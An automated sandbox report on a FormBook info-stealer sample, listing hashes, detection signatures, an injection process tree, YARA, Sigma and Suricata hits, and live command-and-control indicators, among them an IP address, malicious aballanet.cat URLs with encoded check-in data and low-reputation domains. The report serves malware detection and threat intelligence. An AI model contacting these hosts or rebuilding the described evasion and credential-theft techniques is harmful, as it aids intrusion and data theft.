Edit tour

Windows Analysis Report
M7XS5C07kV.exe

Overview

General Information

Sample name:	M7XS5C07kV.exe renamed because original name is a hash value
Original sample name:	0dbe28ff5ab9cae26e7bc59f61fa8641b6b9675cd8276b5f40930ff14d685400.exe
Analysis ID:	1588208
MD5:	82fc7a942b147e01bf1e044b839a6a0b
SHA1:	76100e3f8b7efffab85588fa223292c903b624c3
SHA256:	0dbe28ff5ab9cae26e7bc59f61fa8641b6b9675cd8276b5f40930ff14d685400
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

M7XS5C07kV.exe (PID: 3120 cmdline: "C:\Users\user\Desktop\M7XS5C07kV.exe" MD5: 82FC7A942B147E01BF1E044B839A6A0B)

svchost.exe (PID: 4132 cmdline: "C:\Users\user\Desktop\M7XS5C07kV.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

JqFbrQRYIbA.exe (PID: 5408 cmdline: "C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mobsync.exe (PID: 5992 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)

JqFbrQRYIbA.exe (PID: 3036 cmdline: "C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2500 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\M7XS5C07kV.exe", CommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", ParentImage: C:\Users\user\Desktop\M7XS5C07kV.exe, ParentProcessId: 3120, ParentProcessName: M7XS5C07kV.exe, ProcessCommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", ProcessId: 4132, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\M7XS5C07kV.exe", CommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", ParentImage: C:\Users\user\Desktop\M7XS5C07kV.exe, ParentProcessId: 3120, ParentProcessName: M7XS5C07kV.exe, ProcessCommandLine: "C:\Users\user\Desktop\M7XS5C07kV.exe", ProcessId: 4132, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:50:24.512052+0100	2856318	1	A Network Trojan was detected	192.168.2.8	65520	165.154.96.210	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aballanet.cat/6xrr/?2nI=HxJAUmNG5a	Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl	Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: M7XS5C07kV.exe	Virustotal: Detection: 58%			Perma Link
Source: M7XS5C07kV.exe	ReversingLabs: Detection: 91%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: M7XS5C07kV.exe

Joe Sandbox ML: detected

Source: M7XS5C07kV.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1651287512.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651373601.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651386050.0000000003231000.00000004.00000020.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000002.3297019602.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JqFbrQRYIbA.exe, 00000004.00000000.1603560226.000000000022E000.00000002.00000001.01000000.00000005.sdmp, JqFbrQRYIbA.exe, 00000006.00000002.3296132611.000000000022E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: M7XS5C07kV.exe, 00000000.00000003.1443099591.0000000003900000.00000004.00001000.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1445760931.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585196763.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587698865.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1686094403.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.000000000454E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1691396429.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.00000000043B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: M7XS5C07kV.exe, 00000000.00000003.1443099591.0000000003900000.00000004.00001000.00020000.00000000.sdmp, M7XS5C07kV.exe, 00000000.00000003.1445760931.0000000003AA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1688409314.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1688409314.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585196763.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587698865.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.1686094403.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.000000000454E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1691396429.00000000041FF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299219399.00000000043B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1651287512.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651373601.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1651386050.0000000003231000.00000004.00000020.00020000.00000000.sdmp, JqFbrQRYIbA.exe, 00000004.00000002.3297019602.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3296697636.0000000000749000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299870196.00000000049DC000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000000.1757428448.000000000258C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.000000000683C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3296697636.0000000000749000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3299870196.00000000049DC000.00000004.10000000.00040000.00000000.sdmp, JqFbrQRYIbA.exe, 00000006.00000000.1757428448.000000000258C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1982761385.000000000683C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0063445A
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063C6D1 FindFirstFileW,FindClose,	0_2_0063C6D1
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0063C75C
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0063EF95
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0063F0F2
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0063F3F3
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006337EF
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00633B12
Source: C:\Users\user\Desktop\M7XS5C07kV.exe	Code function: 0_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0063BCBC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_0041C560 FindFirstFileW,FindNextFileW,FindClose,	5_2_0041C560

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then xor eax, eax		5_2_00409D90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_041F04EE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:65520 -> 165.154.96.210:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.izmirescortg.xyz
Source:	DNS query: www.logidant.xyz

Source: global traffic	TCP traffic: 192.168.2.8:65498 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.8:50634 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 45.141.156.114 45.141.156.114
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: YURTEH-ASUA YURTEH-ASUA
Source: Joe Sandbox View	ASN Name: INTERHOPCA INTERHOPCA

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\M7XS5C07kV.exe

Code function: 0_2_006422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_006422EE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 10 Jan 2025 21:49:50 GMTserver: Apacheset-cookie: __tad=1736545790.2606223; expires=Mon, 08-Jan-2035 21:49:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 10 Jan 2025 21:49:53 GMTserver: Apacheset-cookie: __tad=1736545793.8644198; expires=Mon, 08-Jan-2035 21:49:53 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 10 Jan 2025 21:49:55 GMTserver: Apacheset-cookie: __tad=1736545795.6790754; expires=Mon, 08-Jan-2035 21:49:55 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ 